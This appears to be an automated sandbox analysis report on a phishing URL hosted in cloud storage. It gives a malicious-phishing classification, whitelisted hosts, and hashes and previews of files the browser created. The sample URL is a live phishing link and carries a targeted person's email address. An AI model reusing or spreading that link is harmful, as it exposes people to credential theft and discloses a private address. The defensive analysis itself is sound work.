                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Cookbook file name:browseurl.jbs
                                                                                                                                                                                Sample URL:https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1#david.acquaviva@searshc.com
                                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                Number of analysed new started processes analysed:23
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • HDC enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal56.phis.win@32/242@10/9
                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                HDC Information:Failed
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Adjust boot time
                                                                                                                                                                                • Enable AMSI
                                                                                                                                                                                Warnings:
                                                                                                                                                                                Show All
                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 142.250.203.110, 34.104.35.123, 173.194.188.201, 142.250.203.99, 172.217.168.10, 69.16.175.10, 69.16.175.42, 104.18.23.52, 104.18.22.52, 142.250.203.106, 104.21.81.131, 172.67.161.47, 216.58.215.234, 20.82.210.154, 173.222.108.210, 173.222.108.226, 209.197.3.8, 20.54.110.249, 40.112.88.60, 52.251.79.25, 80.67.82.235, 80.67.82.211, 172.217.168.42, 172.217.168.74, 20.82.209.183
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): cds.s5x3j6q5.hwcdn.net, ka-f.fontawesome.com.cdn.cloudflare.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, clientservices.googleapis.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, r4.sn-4g5ednsd.gvt1.com, redirector.gvt1.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, update.googleapis.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, www.gstatic.com, img-prod-cms-rt-microsoft-com.akamaized.net, kit.fontawesome.com.cdn.cloudflare.net, fonts.googleapis.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, r4---sn-4g5ednsd.gvt1.com, content-autofill.googleapis.com, ajax.googleapis.com, fonts.gstatic.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, www.googleapis.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, edgedl.me.gvt1.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                No simulations

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                No context

                                                                                                                                                                                Domains

                                                                                                                                                                                No context

                                                                                                                                                                                ASN

                                                                                                                                                                                No context

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                No context

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):451603
                                                                                                                                                                                Entropy (8bit):5.009711072558331
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:ZHfRTyGZ6lup8Cfrvq4JBPKh+FBlESBw4p6:NfOCzvRKhGvwJ
                                                                                                                                                                                MD5:A78AD14E77147E7DE3647E61964C0335
                                                                                                                                                                                SHA1:CECC3DD41F4CEA0192B24300C71E1911BD4FCE45
                                                                                                                                                                                SHA-256:0D6803758FF8F87081FAFD62E90F0950DFB2DD7991E9607FE76A8F92D0E893FA
                                                                                                                                                                                SHA-512:DDE24D5AD50D68FC91E9E325D31E66EF8F624B6BB3A07D14FFED1104D3AB5F4EF1D7969A5CDE0DFBB19CB31C506F7DE97AF67C2F244F7E7E8E10648EA8321101
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: BDic.... ....6...."..Z..4g....6.2...{/...3...5....AF 1363.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\3995d804-3e44-4a0a-a632-61321a136783.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):177374
                                                                                                                                                                                Entropy (8bit):6.047568426700161
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:SYJVdrQb+8ktzqbVehdMai2IO8evnQ16rYOFcbXafIB0u1GOJmA3iuRl:3rd0hqhdMNnOvBraqfIlUOoSiuRl
                                                                                                                                                                                MD5:45734145197FE29F6445D9D41E0DC1EA
                                                                                                                                                                                SHA1:3F0E22199A377367D35CDA6A4F418607A653745F
                                                                                                                                                                                SHA-256:A196FF283DA29A2F55219E935E2D975E4795D7210D5C13F9DCF1E213F56FE65A
                                                                                                                                                                                SHA-512:B7D3F421C3478E809C81B6A44D3AC4A82F1ECBD7CB7CE3364350C4885B979F1EACC32FEC93A517546FAC4C3D75D8F92E425FD02744005857F395E609C2AB648D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635211041003527e+12,"network":1.635178642e+12,"ticks":134016694.0,"uncertainty":3778021.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799728044"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\400a077f-06f6-45e3-94eb-0bd6e41bf110.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):185747
                                                                                                                                                                                Entropy (8bit):6.076597897590947
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:ozxYJVdrQb+8ktzqbVehdMai2IO8evnQ16rYOFcbXafIB0u1GOJmA3iuRl:A2rd0hqhdMNnOvBraqfIlUOoSiuRl
                                                                                                                                                                                MD5:3D896F5911622EEB950BE36094173680
                                                                                                                                                                                SHA1:9AB02C8A7996236AC1E89F8DB372F41D68A13C5A
                                                                                                                                                                                SHA-256:81AF1D9753FF9227C9E30BD66BCEEE2C47D2618559AB45C936EB1EB2FBB94D04
                                                                                                                                                                                SHA-512:0AF223F45168950BA8AB8A0114D9FE883CED6F71E29E607846C70A9DCAC14458873F87B56F7A38AC15D6F93D6C286AA64BA39D77D7758342D5A644A5DA678496
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635211041003527e+12,"network":1.635178642e+12,"ticks":134016694.0,"uncertainty":3778021.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\47bef7ca-02ff-403a-ac1f-ea639e9c31e4.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:SysEx File -
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):94708
                                                                                                                                                                                Entropy (8bit):3.7429408286243255
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:9nelNToibAz7VU6poNJrCvNX3mpniHzeGatrYLxNxm3fj+r8dmsPoHZJxmOTD5N5:9a2xVKbCaQeLxXboH72TKVbBJZ
                                                                                                                                                                                MD5:CD7BC45E6348892032B8B2141DEA7457
                                                                                                                                                                                SHA1:C9EE8694B26A114EA1AEC1E82B00FE6E05AA10F3
                                                                                                                                                                                SHA-256:CA42834CEE090D52DDDB01B3FCE5E26E77BAA6399706057FF1DD44CB7A44634B
                                                                                                                                                                                SHA-512:00E2DEE63C1C8AC1DF32D61D62CC39F373DD1CD02C5AC191BC5A1D6F22D0DB44034D6FC47A6100B70799E247D2A061A4A6AC28BBE6CDE23195098A9FD3C98367
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .q..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...aI8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\5c632ee2-5244-48c9-9b1a-a9e8df73c0fb.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):177374
                                                                                                                                                                                Entropy (8bit):6.047568426700161
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:SYJVdrQb+8ktzqbVehdMai2IO8evnQ16rYOFcbXafIB0u1GOJmA3iuRl:3rd0hqhdMNnOvBraqfIlUOoSiuRl
                                                                                                                                                                                MD5:45734145197FE29F6445D9D41E0DC1EA
                                                                                                                                                                                SHA1:3F0E22199A377367D35CDA6A4F418607A653745F
                                                                                                                                                                                SHA-256:A196FF283DA29A2F55219E935E2D975E4795D7210D5C13F9DCF1E213F56FE65A
                                                                                                                                                                                SHA-512:B7D3F421C3478E809C81B6A44D3AC4A82F1ECBD7CB7CE3364350C4885B979F1EACC32FEC93A517546FAC4C3D75D8F92E425FD02744005857F395E609C2AB648D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635211041003527e+12,"network":1.635178642e+12,"ticks":134016694.0,"uncertainty":3778021.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799728044"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\5fd46fef-ecc2-43ee-b79a-8f1b7578cdd6.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):95428
                                                                                                                                                                                Entropy (8bit):3.742707489473484
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:tnelNToibAz7VU6poNJrCvNX3mpniHzeGatrYLxNxm3fj+r8dms4+oHZJxmOTD53:Na2xVKboaQeLxXboH72TKVbBJN
                                                                                                                                                                                MD5:7C979B3515C33C2E3F9C398C6D58B5E4
                                                                                                                                                                                SHA1:F03929D6C61869BDE84F63AF5F955B53FF493955
                                                                                                                                                                                SHA-256:574185132EB08DF6EB2280110A4833D9185A5D7B18270F13A094C696955B9E30
                                                                                                                                                                                SHA-512:876BF4070BB4F663BD96D3F4F315C7CC774AE16F46FE7CC8A770580D9C00D0A930C1F5F27350347C486FE88A9B1B0E512EB8F5BFEF0D5C5D70DCD2CEF044EBA2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .t..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...aI8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\98d83354-ff01-4db0-8b41-0010d52c1a29.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):177280
                                                                                                                                                                                Entropy (8bit):6.047297675426721
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:fYJVdrQb+8ktzqbVehdMai2IO8evnQ16rYOFcbXafIB0u1GOJmA3iuRl:Qrd0hqhdMNnOvBraqfIlUOoSiuRl
                                                                                                                                                                                MD5:80E37A304E6F0906D0027E1A50E94491
                                                                                                                                                                                SHA1:0EE44334B54A922A4A10EA94FEE85A85B572F538
                                                                                                                                                                                SHA-256:C29110020F70113EA52367EFC130A7E8ACC5EC322752748B7CDF35ACB06A9A57
                                                                                                                                                                                SHA-512:1162B8EF660BD94A18FB4651C9DF633248120499B3149C61844DBEDC35927CC1A20882ED0753DA03CFA718A05EE1D96F2DCCDF7CE70C626B7CFB7457B9D0F878
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635211041003527e+12,"network":1.635178642e+12,"ticks":134016694.0,"uncertainty":3778021.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799728044"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                Entropy (8bit):3.254162526001658
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:FkXft0xE1n:+ftIE1n
                                                                                                                                                                                MD5:BD4642AD6C750A12D912B20BCB92E14D
                                                                                                                                                                                SHA1:C549F0F48FDD4FBC62E51AC26D7E185160CE2123
                                                                                                                                                                                SHA-256:4FD71FE78DFE203137C89C9FB0734358FF432F2BC83338112DC7B830F9B30F2C
                                                                                                                                                                                SHA-512:04410D12EF327614C3AF1251C9906BFEB2977211A7F53CBB08A8C01F9465A382CD001E51AB936A0D196D359F1DECDDAEAF5E7D1DBD49CE5F4FF91BF5C332B6CF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: sdPC....................s}.....M..2.!..%
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\43837469-081e-4644-b83a-0d100ca5d51d.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5246
                                                                                                                                                                                Entropy (8bit):4.994440913882867
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:nY8Cl3G99pcKILok0JCKL8QkA1LbOTQVuwn:njCQ9pck4KrkA1
                                                                                                                                                                                MD5:0C26544F020118260F415576A47B5787
                                                                                                                                                                                SHA1:C71748C1653841AE9489C8BBA4A049F9C0D148BD
                                                                                                                                                                                SHA-256:0EF94E5BF23A3180CF88D79FF8AB570B065326559A3365C7E463D9747AA1A2A3
                                                                                                                                                                                SHA-512:2578A2EBBAC9E6B9BCB29AE1E180375A5049BBF3291EB5C6C67D52FC7E1EECE27909871A9380C998162703B1B73E361B63255A502261FC7B049CDCE1CD3702C8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13279684639611036","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\5c7d3c80-35f7-4dbc-9484-f79d3e07be0e.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .
